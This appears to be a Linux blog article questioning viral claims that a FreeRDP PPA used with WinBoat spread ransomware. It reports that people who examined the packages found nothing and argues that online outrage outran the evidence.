Hysteria is contagious online. One person’s worry becomes another’s conviction, and that belief hardens — the thrill of righteous outrage is addictive! This week saw claims a PPA is being used to distribute Linux ransomware go wild online — but is it true?
The story is a bit long, and a bit dry but it goes like this:
A user said they tried to install WinBoat (a tool for running Windows apps on Linux) but it wouldn’t connect to FreeRDP. So they tried FreeRDP from different sources, to no avail. Then, they saw a comment on GitHub about a custom FreeRDP PPA.
The added the random PPA, and et voila: things appeared to work.
At this point, there was no sign of ransomware, encrypted home directories or anything untoward.
They began to install Windows in WinBoat, then left their PC alone for a day or so. When they returned to their PC (which hadn’t been used in the meantime) they found their home directory encrypted and the system ‘infected with ransomware’.
Their conclusion was that the PPA was to blame.
They took to Reddit to warn people about the version of FreeRDP in this PPA. From there, the online Outrage Industrial Complex® took over and, without little concrete evidence to back it up, the PPA cast as villain and panic spread.
Canonical was informed, and it pulled the PPA in question (not before a few people downloaded the contents), while the account of the person who maintains the packages within it got reported to GitHub and, apparently, banned promptly.
The inconvenient bit
Assumption is not proof. Though Linux ransomware exists, it’s rare. If a PPA was really being used to distribute it, unawares, it’d be novel as much as worrying. Naturally, calmer heads online were curious and want to find out more.
What sort of ransomware, how sophisticated (or not), any hallmarks on who is behind it, the servers it talks to, and where it came from, eyc.
With scant detail from the OP (who hosed their system), some folks concerned by the idea decided (or should that be DEB-cided?) to do the obvious thing and actually take look at the contents of the packages in the PPA.
And they found…
Nothing.
One reported: “I investigated the binary and some of the libraries it uses and I’ve failed to see anything suspicious. No weird files being opened, nothing interesting. I also can’t find the payload.”
The same with others who examined the files.
Surely there couldn’t be something more obvious to blame?
Emotion in the driving seat
I can’t lie: finding your Linux PC in an unexpected state (by which I don’t mean it’s covered in cat sick) is troubling. Concern, panic and a desire to warn others is understandable. When it comes to security, heightened sensitivity is forgivable.
But, clearly, the need for evidence ought to be paramount, and shouldn’t take a backseat to emotion.
Given that the infected “set up” involves running a full copy of Windows — a magnet for malware — as a virtual machine inside of a Docker container accessed through FreeRDP which is then “integrated” into the Linux desktop, is a PPA even the most likely culprit?
Some have suggested that Makop, a piece of malware that targets RDP and is intended for Windows, could be to blame; others note that the way WinBoat’s Linux integration works, it is feasible for Windows malware to encrypt Linux system folders.
Beyond that, WinBoat is designed to fetch packages from remote servers – which often then fetch from mirrors – to support its Windows app running capabilities. It’s not a leap to ask if that route might have been compromised.
Panic over?
The original reporter has since said that the “infection did not appear immediately after compiling or running WinBoat or FreeRDP”, and that “the exact entry point remains unclear”.
They also say they did not mean to “start a witch hunt”, and has publicly apologised to the developer whose GitHub account was banned as a result of the furore. The PPA Canonical pulled? That’s still offline while its engineers vet its contents.
It’ll be interesting to see what they find — if anything.
The thing that worries me? The immediacy with which this snowballed on emotion rather than evidence to the point a person’s Github developer account was allegedly1 banned by automated systems responding to an influx of reports.
That sort of outrage could be weaponised. With many critical open-source projects (which power major infrastructure) rest solely on the shoulders of a single developer who does it for the love it, that is more scary than PPA phantomware.
- The GitHub account that was reportedly banned, and for which the OP apologised for having inadvertently helped get banned, is actually still live, so… Maybe this will go REALLY Reddit and turn out to be some kind of meta conspiracy between two devs duking it out. ↩︎